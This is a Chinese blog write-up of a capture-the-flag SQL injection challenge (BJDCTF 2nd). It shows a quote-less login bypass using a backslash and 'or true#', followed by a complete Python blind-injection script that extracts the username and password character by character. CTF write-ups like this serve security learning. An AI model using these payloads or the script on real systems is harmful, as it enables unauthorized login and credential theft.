[BJDCTF 2nd]简单注入

预备知识:盲注,无引号sql注入

扫目录,发现hint.txt

看不懂字写的什么,转码半天还是看不懂。

看这个语句感觉像是无引号sql注入。

尝试:

username:admin\
password:or 1=1#

被过滤

经测试,=,union,select等等都被过滤。

那就经典true:

username:admin\
password:or true#

登陆进去了,啥也没有。

就是回显不同,基本上确定是盲注了。

这里因为union select被过滤,所以换if。

import requests
import time
url = 'http://065672b9-fc75-4365-848d-88311685df15.node3.buuoj.cn/index.php'
result = ''
 
for x in range(1,50):
    high = 127
    low = 32
    mid = (high+low)//2     
    while high>low:
        payload = "or/**/if(ascii(substr(username,{0},1))>{1},1,0)#"  .format(x,mid)
        #payload = "or/**/if(ascii(substr(password,{0},1))>{1},1,0)#"  .format(x,mid)
        data = {'username':"admin\\",'password':payload}
        html = requests.post(url,data=data).text     
        time.sleep(0.5)
        if "stronger" in html:
            low = mid+1
        else:
            high=mid
        mid = (low+high)//2
    result += chr(int(mid))     
    print(result)
print("flag:",result) 

跟之前的盲注没什么区别

猜得username:admin

password:OhyOuFOuNdit

进去就有flag

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇